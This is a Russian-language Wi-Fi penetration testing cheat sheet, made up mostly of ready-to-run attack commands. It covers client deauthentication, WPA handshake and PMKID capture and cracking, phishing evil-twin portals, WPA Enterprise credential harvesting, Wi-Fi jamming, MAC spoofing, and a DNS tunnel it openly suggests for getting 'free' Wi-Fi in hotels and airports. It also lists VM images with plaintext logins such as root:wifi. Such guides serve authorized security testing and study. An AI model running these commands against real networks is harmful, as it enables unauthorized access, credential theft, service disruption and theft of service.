
Руководство по тестированию на проникновение Wi-Fi
2.1. Порталы авторизации
3.1. Без клиентов
4.1. Взлом 4-стороннего рукопожатия
4.2. Атака PMKID
5.2. Полный перебор
6.1. Krack Attack и Frag Attack
6.2. OSINT
6.3. Глушение WiFi
6.4. Другие фреймворки
7.2. Типы сканеров
7.3. Спуфинг
VARIABLE=value
iwconfig $IFACE
ifconfig $IFACE
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up
Установите режим монитора
Запустите Airodump-ng
airodump-ng $IFACE -c $CHANNEL -e $ESSID
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE
Составьте список сетей с помощью Airodump-ng и получите MAC-адрес точки доступа ($AP_MAC) и одного из клиентов ($CLIENT_MAC). Не останавливайте захват.
В другом терминале деаутентифицируйте одного или всех клиентов. Когда Airodump-ng захватит рукопожатие от этой сети, имя или ESSID появится в первом терминале:
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
Составьте список сетей с помощью Airodump-ng и получите MAC-адрес точки доступа ($AP_MAC) и одного из клиентов ($CLIENT_MAC). Не останавливайте захват.
2.a. Выполните атаку по словарю
mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH
2.b. Или выполните атаку полным перебором
mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET
Для набора символов можно использовать l (строчные буквы), u (заглавные буквы), n (цифры), c (строчные+заглавные), m (строчные+заглавные+цифры) или a (все печатные символы).
Клонируйте сайт с помощью HTTrack
Установите Wifiphiser. Поместите результат HTTrack в новую папку wifiphisher/data/phishing-pages/new_page/html и файл конфигурации в wifiphisher/data/phishing-pages/new_page/config.ini.
Перекомпилируйте проект с помощью python setup.py install или бинарника в bin.
Эта команда корректно работает в последней версии Kali после установки hostapd:
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE
Первый метод обхода портала авторизации — изменить ваш MAC-адрес на адрес уже авторизованного пользователя.
macchanger
Пользовательский скрипт, например этот(Bash)
Также можно использовать скрипты для автоматизации процесса, например:
Второй метод — создание DNS-туннеля. Для этого необходимо иметь собственный доступный DNS-сервер. Вы можете использовать этот метод, чтобы обойти портал авторизации и получить «бесплатный» Wi-Fi в отелях, аэропортах и т.д.
nslookup example.com
A-запись: dns.$DOMAIN, указывающая на $SERVER_IP (Пример: dns.domain.com 139.59.172.117)
NS-запись: hack.$DOMAIN, указывающая на dns.$DOMAIN (Пример: hack.domain.com dns.domain.com)
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
Проверьте, работает ли корректно здесь
Выполните на клиенте
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
ssh -D 8080 [email protected]
После подключения к сети можно проверить, уязвима ли она для атак типа «Человек посередине».
ARP-спуфинг с помощью Ettercap
Перехват трафика с помощью Wireshark или TCPdump
Анализ трафика с помощью PCredz (Linux) или Network Miner (Windows)
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng $PCAP_FILE
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng -w $WORDLIST capture.cap
Списки слов можно получить здесь.
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db
Вы можете использовать этот скрипт или выполнить следующие шаги:
Установите Hcxdumptool и Hcxtool (можно использовать этот скрипт).
Остановите Network Manager
airmon-ng check kill
3a. Если вы хотите атаковать конкретный MAC-адрес
echo $MAC | sed 's/://g' > $FILTER_FILE
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE
Структура каждой строки: PMKID * MAC РОУТЕРА * СТАНЦИЯ * ESSID (проверьте на: https://www.rapidtables.com/convert/number/hex-to-ascii.html)
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force
Если у вас есть доступ к клиентскому устройству с включенным Wi-Fi, но рядом нет сети, вы всё равно можете атаковать эту сеть, если клиентское устройство ранее подключалось к ней.
Для этого нужно создать поддельную точку доступа с помощью hostapd и конфигурационного файла, подобного этому, с любым паролем, но тем же именем сети. Создайте поддельную сеть, клиентское устройство попытается подключиться к ней, и вы получите 4-стороннее рукопожатие, как в разделе 4.1 этого руководства.
Если вы не хотите использовать виртуальную машину, вы можете установить всё с помощью:
git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack
cd WPA_Enterprise_Attack && sudo sh install.sh
Запустите точку доступа с помощью:
sh freeradius_wpe_init.sh $AP_NAME $INTERFACE
Когда клиент подключится, прочитайте логи с помощью:
sh freeradius_wpe_read.sh
sh hostapd_wpe_init.sh $AP_NAME $INTERFACE
Определите поддерживаемые методы EAP
Это две продвинутые атаки, открытые великим Mathy Vanhoef:
Krack Attack Scripts — объяснено на этом сайте
Frag Attack Scripts — объяснено на этом сайте
Пример деаутентификации всех устройств, кроме поддельной точки доступа:
sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC
Linux:
Windows:
После того, как вы подключились к сети
Nmap/Zenmap — сканер безопасности, сканер портов и инструмент исследования сети
Masscan — более быстрая версия nmap (может нарушить работу, будьте осторожны)
Netdiscover — ARP-сниффинг. Очень полезен, если сети сильно сегментированы
| Операционная система | Платформа | Учётные данные | Размер | Ссылка |
|---|
| Ubuntu 16.04.5 | VMware | ricardojoserf:wifi | 3.25 ГБ | MEGA |
| Kali 2019.1 | VMware | root:wifi | 4.99 ГБ | MEGA |
| Ubuntu 16.04.5 | VirtualBox (OVA) | ricardojoserf:wifi | 3.18 ГБ | MEGA |
| Kali 2019.1 | VirtualBox (OVA) | root:wifi | 5.56 ГБ | MEGA |